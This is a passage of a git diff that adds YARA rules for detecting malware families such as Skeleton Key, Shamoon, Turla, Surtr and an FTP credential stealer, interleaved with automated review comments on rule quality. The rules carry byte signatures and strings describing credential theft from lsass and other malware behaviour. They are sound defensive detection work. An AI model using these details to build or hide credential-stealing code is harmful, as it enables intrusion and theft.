+rule Rooter : Family
+{
+    meta:
+        description = "Rooter"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    condition:
+        RooterCode or RooterStrings
+}
+
+rule RookieCode : Rookie Family 
+{
+    meta:
+        description = "Rookie code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        // hidden AutoConfigURL
+        $ = { C6 ?? ?? ?? 41 C6 ?? ?? ?? 75 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 43 C6 ?? ?? ?? 6F C6 ?? ?? ?? 6E C6 ?? ?? ?? 66 }
+        // hidden ProxyEnable
+        $ = { C6 ?? ?? ?? 50 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 78 C6 ?? ?? ?? 79 C6 ?? ?? ?? 45 C6 ?? ?? ?? 6E C6 ?? ?? ?? 61 }
+        // xor on rand value?
+        $ = { 8B 1D 10 A1 40 00 [18] FF D3 8A 16 32 D0 88 16 }
+
+    condition:
+        any of them
+}
+
+rule Rookie : Family
+{
+    meta:
+        description = "Rookie"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        RookieCode or RookieStrings
+}
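Review bot: `rule Rookie` references `RookieStrings`, which is not defined anywhere in this file (only `RookieCode` is), so YARA will reject the whole file with an undefined identifier error and every Rooter rule in it is lost as well. Either add the missing `RookieStrings` rule above `Rookie` or reduce the condition to `RookieCode` until it exists. The Rookie rules also live in `Rooter.yar` rather than a file of their own, which is presumably how the strings rule went missing in the split.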
diff --git a/malware/Safenet.yar b/malware/Safenet.yar
new file mode 100644
index 0000000..be7d844
--- /dev/null
+++ b/malware/Safenet.yar
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule SafeNetCode : SafeNet Family 
+{
+    meta:
+        description = "SafeNet code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-16"
+        
+    strings:
+        // add edi, 14h; cmp edi, 50D0F8h
+        $ = { 83 C7 14 81 FF F8 D0 40 00 }
+    condition:
+        any of them
+}
+
+rule SafeNetStrings : SafeNet Family
+{
+    meta:
+        description = "Strings used by SafeNet"
+        author = "Seth Hardy"
+        last_modified = "2014-07-16"
+        
+    strings:
+        $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"
+        $ = "/safe/record.php"
+        $ = "_Rm.bat" wide ascii
+        $ = "try\x0d\x0a\x09\x09\x09\x09  del %s" wide ascii
+        $ = "Ext.org" wide ascii
+        
+    condition:
+        any of them
+
+}
+
+rule SafeNet : Family
+{
+    meta:
+        description = "SafeNet family"
+        
+    condition:
+        SafeNetCode or SafeNetStrings
+        
+}
+
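Review bot: The comment on the `SafeNetCode` pattern says `cmp edi, 50D0F8h`, but the bytes `81 FF F8 D0 40 00` encode an immediate of `0040D0F8h`, so the comment and the signature disagree and a reader cannot tell which is wrong. If the bytes are right, change the comment to `// add edi, 14h; cmp edi, 40D0F8h`; if the immediate was meant to be 50D0F8h the pattern should read `83 C7 14 81 FF F8 D0 50 00`. Separately, `SafeNetStrings` fires on `any of them` and `Ext.org` is a seven-character substring that can sit inside longer host names, so it would be safer nul-terminated or `fullword`; the `SafeNet` rule is also missing the `author`/`last_modified` meta its siblings carry.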
diff --git a/malware/Scarhikn.yar b/malware/Scarhikn.yar
new file mode 100644
index 0000000..97f034d
--- /dev/null
+++ b/malware/Scarhikn.yar
@@ -0,0 +1,57 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ScarhiknStrings : Scarhikn Family
+{
+    meta:
+        description = "Scarhikn Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "9887___skej3sd"
+        $ = "haha123"
+        
+    condition:
+       any of them
+}
+
+
+
+rule ScarhiknCode : Scarhikn Family 
+{
+    meta:
+        description = "Scarhikn code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+    
+    strings:
+        // decryption
+        $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }
+        $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }
+    
+    condition:
+        any of them
+}
+
+rule Scarhikn : Family
+{
+    meta:
+        description = "Scarhikn"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        ScarhiknCode or ScarhiknStrings
+}
+
+
+
+
+
+
+
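Review bot: `ScarhiknStrings` matches on `any of them`, and `haha123` is a common throwaway password and test token that turns up in unrelated binaries, documents and wordlists, so that string on its own should not be a verdict. Keep `9887___skej3sd` as a standalone indicator but gate the weaker one on a PE container, e.g. name the strings `$a`/`$b` and use `condition: $a or (uint16(0) == 0x5A4D and $b)`. The run of blank lines after `rule Scarhikn` can be dropped.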
diff --git a/malware/Scieron.yar b/malware/Scieron.yar
new file mode 100644
index 0000000..4a8a9d7
--- /dev/null
+++ b/malware/Scieron.yar
@@ -0,0 +1,34 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Scieron
+{
+    meta:
+        author = "Symantec Security Response"
+        ref = "http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012"
+        date = "22.01.15"
+
+    strings:
+        // .text:10002069 66 83 F8 2C                       cmp     ax, ','
+        // .text:1000206D 74 0C                             jz      short loc_1000207B
+        // .text:1000206F 66 83 F8 3B                       cmp     ax, ';'
+        // .text:10002073 74 06                             jz      short loc_1000207B
+        // .text:10002075 66 83 F8 7C                       cmp     ax, '|'
+        // .text:10002079 75 05                             jnz     short loc_10002080
+        $code1 = {66 83 F? 2C 74 0C 66 83 F? 3B 74 06 66 83 F? 7C 75 05}
+        
+        // .text:10001D83 83 F8 09                          cmp     eax, 9          ; switch 10 cases
+        // .text:10001D86 0F 87 DB 00 00 00                 ja      loc_10001E67    ; jumptable 10001D8C default case
+        // .text:10001D8C FF 24 85 55 1F 00+                jmp     ds:off_10001F55[eax*4] ; switch jump
+        $code2 = {83 F? 09 0F 87 ?? 0? 00 00 FF 24}
+        
+        $str1  = "IP_PADDING_DATA" wide ascii
+        $str2  = "PORT_NUM" wide ascii
+        
+    condition:
+        all of them
+}
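Review bot: The `date` meta is written as `22.01.15`, which is ambiguous and differs from the `22.01.2015` form the other Symantec rules in this commit use; write `date = "22.01.2015"` (or ISO `2015-01-22`) so metadata sorts and filters consistently. The inline disassembly shows `0F 87 DB 00 00 00` while `$code2` widens it to `0F 87 ?? 0? 00 00`, so a short comment such as `// ja displacement wildcarded to survive recompiles` would make clear the looseness is deliberate rather than a typo.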
diff --git a/malware/ShadowTech.yar b/malware/ShadowTech.yar
new file mode 100644
index 0000000..a399b2d
--- /dev/null
+++ b/malware/ShadowTech.yar
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ShadowTech
+{
+    meta:
+        description = "ShadowTech RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /\#(S)trings/
+        $string2 = /\#(G)UID/
+        $string3 = /\#(B)lob/
+        $string4 = /(S)hadowTech Rat\.exe/
+        $string5 = /(S)hadowTech_Rat/
+
+    condition:
+        all of them
+}
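Review bot: All five strings are plain literals wrapped in regular expressions with a pointless single-character capture group (`/\#(S)trings/`), which costs regex scanning for no gain in what is matched. Rewrite them as text strings, e.g. `$string1 = "#Strings" ascii` and `$string4 = "ShadowTech Rat.exe" ascii`, and likewise for the rest. `#Strings`, `#GUID` and `#Blob` look like the standard .NET metadata stream names present in most managed assemblies, so the real discriminators are `$string4`/`$string5`; if the module name can be stored as UTF-16 in some builds, `ascii wide` on those two is worth considering.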
diff --git a/malware/Shamoon.yar b/malware/Shamoon.yar
new file mode 100644
index 0000000..f4eb7fc
--- /dev/null
+++ b/malware/Shamoon.yar
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule CrowdStrike_Shamoon_DroppedFile { 
+	meta:
+		description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
+		reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
+	strings:
+		$testn123 = "test123" wide
+		$testn456 = "test456" wide
+		$testn789 = "test789" wide
+		$testdomain = "testdomain.com" wide $pingcmd = "ping -n 30 127.0.0.1 >nul" wide
+	condition:
+		(any of ($testn*) or $pingcmd) and $testdomain
+}
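Review bot: Two string declarations share one line — `$testdomain = "testdomain.com" wide $pingcmd = "ping -n 30 127.0.0.1 >nul" wide` — which YARA accepts but which hides `$pingcmd` from anyone reading or diffing the rule; split it into `$testdomain = "testdomain.com" wide` and `$pingcmd = "ping -n 30 127.0.0.1 >nul" wide` on separate lines. The rule also carries no `author` or `date` meta even though its name attributes it to CrowdStrike, and the description points at a `goo.gl` short link, which is opaque and may stop resolving; record the original URL instead.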
diff --git a/malware/Skeleton.yar b/malware/Skeleton.yar
new file mode 100644
index 0000000..84bd218
--- /dev/null
+++ b/malware/Skeleton.yar
@@ -0,0 +1,49 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule skeleton_key_patcher
+{
+	meta:
+		description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		reference = "http://goo.gl/aAk3lN"
+		date = "2015/01/13"
+		score = 70
+	strings:
+		$target_process = "lsass.exe" wide
+		$dll1 = "cryptdll.dll"
+		$dll2 = "samsrv.dll"
+
+		$name = "HookDC.dll"
+
+		$patched1 = "CDLocateCSystem"
+		$patched2 = "SamIRetrievePrimaryCredentials"
+		$patched3 = "SamIRetrieveMultiplePrimaryCredentials"
+	condition:
+		all of them
+}
+
+rule skeleton_key_injected_code
+{
+	meta:
+		description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		reference = "http://goo.gl/aAk3lN"
+		date = "2015/01/13"
+		score = 70
+	strings:
+		$injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
+
+		$patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
+
+		$patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+
+		$patch_SamIRetrieveMultiplePrimaryCredential  = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+
+	condition:
+		any of them
+}
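Review bot: `skeleton_key_injected_code` fires on `any of them`, but `$injected` decodes to what looks like an ordinary MSVC x64 epilogue — `xor eax,eax; test ecx,ecx; setne al; mov rcx,[rsp+140h]; xor rcx,rsp; call <cookie check>; add rsp,158h; ret` — so it is compiler boilerplate distinguished only by a fixed frame size and call displacement and can hit unrelated 64-bit binaries. Consider letting the three `$patch_*` function bodies stand alone and demoting `$injected` to a supporting indicator, e.g. `condition: any of ($patch_*) or ($injected and skeleton_key_patcher)`, which works because `skeleton_key_patcher` is defined above. A comment above `$injected` noting that it is a stack-cookie epilogue would help the next maintainer judge that trade-off.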
diff --git a/malware/Stealer.yar b/malware/Stealer.yar
new file mode 100644
index 0000000..2c3ffe4
--- /dev/null
+++ b/malware/Stealer.yar
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule universal_1337_stealer_serveur : Stealer
+{
+	meta:
+		author="Kevin Falcoz"
+		date="24/02/2013"
+		description="Universal 1337 Stealer Serveur"
+		
+	strings:
+		$signature1={2A 5B 53 2D 50 2D 4C 2D 49 2D 54 5D 2A} /*[S-P-L-I-T]*/
+		$signature2={2A 5B 48 2D 45 2D 52 2D 45 5D 2A} /*[H-E-R-E]*/
+		$signature3={46 54 50 7E} /*FTP~*/
+		$signature4={7E 31 7E 31 7E 30 7E 30} /*~1~1~0~0*/
+		
+	condition:
+		$signature1 and $signature2 or $signature3 and $signature4
+}
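Review bot: The condition `$signature1 and $signature2 or $signature3 and $signature4` relies on `and` binding tighter than `or`, which YARA honours but which is easy to misread as the first two always being required; write it as `($signature1 and $signature2) or ($signature3 and $signature4)`. The second branch rests on two short strings, `FTP~` and `~1~1~0~0`, that can co-occur in unrelated files, so a `uint16(0) == 0x5A4D` guard on that branch is worth considering. Since all four hex patterns are plain ASCII, they read better as text strings, e.g. `$signature1 = "*[S-P-L-I-T]*"`, which also removes the need for the decoding comments.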
diff --git a/malware/Surtr.yar b/malware/Surtr.yar
new file mode 100644
index 0000000..bd350f7
--- /dev/null
+++ b/malware/Surtr.yar
@@ -0,0 +1,138 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RSharedStrings : Surtr Family {
+	meta:
+		description = "identifiers for remote and gmremote"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "nView_DiskLoydb" wide
+		$ = "nView_KeyLoydb" wide
+		$ = "nView_skins" wide
+		$ = "UsbLoydb" wide
+		$ = "%sBurn%s" wide
+		$ = "soul" wide
+
+	condition:
+		any of them
+
+}
+
+rule RemoteStrings : Remote Variant Surtr Family {
+	meta:
+		description = "indicators for remote.dll - surtr stage 2"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "\x00Remote.dll\x00"
+		$ = "\x00CGm_PlugBase::"
+		$ = "\x00ServiceMain\x00_K_H_K_UH\x00"
+		$ = "\x00_Remote_\x00" wide
+	condition:
+		any of them
+}
+
+rule GmRemoteStrings : GmRemote Variant Family Surtr {
+	meta:
+		description = "identifiers for gmremote: surtr stage 2"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "\x00x86_GmRemote.dll\x00"
+		$ = "\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00"
+		$ = "\x00GmShutPoint\x00"
+		$ = "\x00GmRecvPoint\x00"
+		$ = "\x00GmInitPoint\x00"
+		$ = "\x00GmVerPoint\x00"
+		$ = "\x00GmNumPoint\x00"
+		$ = "_Gt_Remote_" wide
+		$ = "%sBurn\\workdll.tmp" wide
+	
+	condition:
+		any of them
+
+}
+
+
+rule GmRemote : Family Surtr Variant GmRemote {
+	meta:
+		description = "identifier for gmremote"
+		author = "Katie Kleemola"
+		last_updated = "07-25-2014"
+	
+	condition:
+		RSharedStrings and GmRemoteStrings
+}
+
+rule Remote : Family Surtr Variant Remote {
+	meta:
+		description = "identifier for remote"
+		author = "Katie Kleemola"
+		last_updated = "07-25-2014"
+	
+	condition:
+		RSharedStrings and RemoteStrings
+}
+
+rule SurtrStrings : Surtr Family {	
+	meta: 
+		author = "Katie Kleemola"
+		description = "Strings for Surtr"
+		last_updated = "2014-07-16"
+
+	strings:
+		$ = "\x00soul\x00"
+		$ = "\x00InstallDll.dll\x00"
+		$ = "\x00_One.dll\x00"
+		$ = "_Fra.dll"
+		$ = "CrtRunTime.log"
+		$ = "Prod.t"
+		$ = "Proe.t"
+		$ = "Burn\\"
+		$ = "LiveUpdata_Mem\\"
+
+	condition:
+		any of them
+
+}
+
+rule SurtrCode : Surtr Family {
+	meta: 
+		author = "Katie Kleemola"
+		description = "Code features for Surtr Stage1"
+		last_updated = "2014-07-16"
+	
+	strings:
+		//decrypt config
+		$ = { 8A ?? ?? 84 ?? ?? 74 ?? 3C 01 74 ?? 34 01 88 41 3B ?? 72 ?? }
+		//if Burn folder name is not in strings
+		$ = { C6 [3] 42 C6 [3] 75 C6 [3] 72 C6 [3] 6E C6 [3] 5C }
+		//mov char in _Fire
+		$ = { C6 [3] 5F C6 [3] 46 C6 [3] 69 C6 [3] 72 C6 [3] 65 C6 [3] 2E C6 [3] 64 }
+
+	condition:
+		any of them
+
+}
+
+rule Surtr : Family {
+	meta:
+		author = "Katie Kleemola"
+		description = "Rule for Surtr Stage One"
+		last_updated = "2014-07-16"
+
+	condition:
+		SurtrStrings or SurtrCode
+
+}
+
+
+
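Review bot: `SurtrStrings` uses `any of them` over several very short strings — `Burn\\`, `Prod.t`, `Proe.t` — which are substrings of ordinary paths and file names (`Prod.txt`, any directory named `Burn`), so the composite `Surtr` rule will fire on unrelated files. Anchor the weak ones, e.g. `$ = "Prod.t\x00"` and `$ = "Proe.t\x00"`, and pair or drop `Burn\\`, while letting the distinctive `\x00InstallDll.dll\x00` and `\x00_One.dll\x00` strings stand alone. `RSharedStrings` has the same problem with `"soul" wide` and is a public rule, so it reports on its own although it is only a building block for `GmRemote` and `Remote`; `private rule RSharedStrings : Surtr Family` would keep it from surfacing alone. The `last_updated` values mix `07-21-2014` and `2014-07-16` and should be normalised to one format.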
diff --git a/malware/T5000.yar b/malware/T5000.yar
new file mode 100644
index 0000000..cbbabdc
--- /dev/null
+++ b/malware/T5000.yar
@@ -0,0 +1,44 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule T5000Strings : T5000 Family
+{
+    meta:
+        description = "T5000 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-26"
+        
+    strings:
+        $ = "_tmpR.vbs"
+        $ = "_tmpg.vbs"
+        $ = "Dtl.dat" wide ascii
+        $ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E"
+        $ = "EED5CA6C-9958-4611-B7A7-1238F2E1B17E"
+        $ = "8A8FF8AD-D1DE-4cef-B87C-82627677662E"
+        $ = "43EE34A9-9063-4d2c-AACD-F5C62B849089"
+        $ = "A8859547-C62D-4e8b-A82D-BE1479C684C9"
+        $ = "A59CF429-D0DD-4207-88A1-04090680F714"
+        $ = "utd_CE31" wide ascii
+        $ = "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb"
+        $ = "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb"
+        $ = "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb"
+        $ = "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb"
+        
+    condition:
+       any of them
+}
+
+rule T5000 : Family
+{
+    meta:
+        description = "T5000"
+        author = "Seth Hardy"
+        last_modified = "2014-06-26"
+        
+    condition:
+        T5000Strings
+}
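Review bot: The six GUID strings are matched case-sensitively in the exact mixed case given (`3C6FB3CA-69B1-454f-8B2F-...`), but GUIDs are routinely rendered all-uppercase or all-lowercase depending on where they are emitted, so a build that stores them differently will be missed; add `nocase` (and `wide ascii`, since registry-bound GUIDs are often UTF-16) to those six, e.g. `$ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E" wide ascii nocase`. That is inferred from the strings themselves rather than from samples, so confirm against the binaries before widening. The PDB paths are the strongest indicators here and are fine as they are.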
diff --git a/malware/Turla.yar b/malware/Turla.yar
new file mode 100644
index 0000000..3d70cbf
--- /dev/null
+++ b/malware/Turla.yar
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WaterBug_turla_dll 
+{
+    meta:
+        description = "Symantec Waterbug Attack - Trojan Turla DLL"
+        author = "Symantec Security Response"
+        date = "22.01.2015"
+        reference = "http://t.co/rF35OaAXrl"   
+
+    strings:
+        $a = /([A-Za-z0-9]{2,10}_){,2}Win32\.dll\x00/
+   
+    condition:
+        pe.exports("ee") and $a
+}
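Review bot: The optional prefix `([A-Za-z0-9]{2,10}_){,2}` means `$a` also matches a bare `Win32.dll\x00`, so the regex alone covers any DLL whose name ends in `Win32.dll` and the rule's specificity rests entirely on `pe.exports("ee")`; that deserves a comment such as `// export "ee" is the discriminator; $a alone is generic`. The `reference` is a `t.co` short link that conveys nothing and may stop resolving — record the Symantec Waterbug report URL it points to instead.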
diff --git a/malware/Urausy.yar b/malware/Urausy.yar
new file mode 100644
index 0000000..dc4832f
--- /dev/null
+++ b/malware/Urausy.yar
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule urausy_skype_dat {
+	meta:
+		author = "AlienVault Labs"
+		description = "Yara rule to match against memory of processes infected by Urausy skype.dat"
+	strings:
+		$a = "skype.dat" ascii wide
+		$b = "skype.ini" ascii wide
+		$win1 = "CreateWindow"
+		$win2 = "YIWEFHIWQ" ascii wide
+		$desk1 = "CreateDesktop"
+		$desk2 = "MyDesktop" ascii wide
+	condition:
+		$a and $b and (all of ($win*) or all of ($desk*))
+}
diff --git a/malware/Vidgrab.yar b/malware/Vidgrab.yar
new file mode 100644
index 0000000..eb04fee
--- /dev/null
+++ b/malware/Vidgrab.yar
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule VidgrabCode : Vidgrab Family 
+{
+    meta:
+        description = "Vidgrab code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $divbyzero = { B8 02 00 00 00 48 48 BA 02 00 00 00 83 F2 02 F7 F0 }
+        // add eax, ecx; xor byte ptr [eax], ??h; inc ecx
+        $xorloop = { 03 C1 80 30 (66 | 58) 41 }
+        $junk = { 8B 4? ?? 8B 4? ?? 03 45 08 52 5A }
+        
+    condition:
+        all of them
+}
+
+rule VidgrabStrings : Vidgrab Family
+{
+    meta:
+        description = "Vidgrab Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $ = "IDI_ICON5" wide ascii
+        $ = "starter.exe"
+        $ = "wmifw.exe"
+        $ = "Software\\rar"
+        $ = "tmp092.tmp"
+        $ = "temp1.exe"
+        
+    condition:
+       3 of them
+}
+
+rule Vidgrab : Family
+{
+    meta:
+        description = "Vidgrab"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    condition:
+        VidgrabCode or VidgrabStrings
+}
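Review bot: The comment on `$xorloop` says `xor byte ptr [eax], ??h`, but the pattern pins the immediate to `66h` or `58h` via `(66 | 58)`, so the comment understates what the signature requires; change it to `// add eax, ecx; xor byte ptr [eax], 66h or 58h; inc ecx`. `$divbyzero` and `$junk` carry no comment at all; `$divbyzero` looks like `mov eax,2; dec eax; dec eax; mov edx,2; xor edx,2; div eax`, i.e. a deliberately constructed divide-by-zero, and `$junk` ends in a `push edx; pop edx` no-op, so a one-liner naming each trick would make `all of them` easier to maintain.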
diff --git a/malware/Warp.yar b/malware/Warp.yar
new file mode 100644
index 0000000..56540bf
--- /dev/null
+++ b/malware/Warp.yar
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WarpCode : Warp Family 
+{
+    meta:
+        description = "Warp code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+    
+    strings:
+        // character replacement
+        $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }
+    
+    condition:
+        any of them
+}
+
+rule WarpStrings : Warp Family
+{
+    meta:
+        description = "Warp Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    strings:
+        $ = "/2011/n325423.shtml?"
+        $ = "wyle"
+        $ = "\\~ISUN32.EXE"
+
+    condition:
+       any of them
+}
+
+rule Warp : Family
+{
+    meta:
+        description = "Warp"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    condition:
+        WarpCode or WarpStrings
+}
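Review bot: `WarpStrings` fires on `any of them`, and `wyle` is a four-byte lowercase ASCII string that will occur by chance in large binaries and in ordinary text, so the composite `Warp` rule will produce noise from that string alone. Name the strings and gate the weak one on the code pattern, which is defined above and can be referenced: `condition: $url or $isun or ($wyle and WarpCode)`, or at minimum anchor it as `$wyle = "wyle" fullword`.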
diff --git a/malware/Waterbug.yar b/malware/Waterbug.yar
new file mode 100644
index 0000000..8d75e46
--- /dev/null
+++ b/malware/Waterbug.yar
@@ -0,0 +1,100 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WaterBug_wipbot_2013_core_PDF {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings:
+		$PDF = "%PDF-"
+		$a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/ 
+		$b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
+	condition:
+		($PDF at 0) and #a > 150 and #b > 200
+}
+
+rule WaterBug_wipbot_2013_dll {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"		
+	strings:
+		$string1 = "/%s?rank=%s"
+		$string2 = "ModuleStart\x00ModuleStop\x00start"
+		$string3 = "1156fd22-3443-4344-c4ffff"
+		//read file... error..
+		$string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
+	condition:
+		2 of them
+}
+
+rule WaterBug_wipbot_2013_core {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"			
+	strings:
+		$mz = "MZ"
+		$code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
+		$code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
+		$code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04} $code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
+	condition:
+		$mz at 0 and (($code1 or $code2) or ($code3 and $code4))
+}
+
+rule WaterBug_turla_dropper {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan Turla Dropper"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings: 
+		$a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
+		$b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
+	condition: 
+		all of them
+}
+
+rule WaterBug_fa_malware { 
+	meta: 
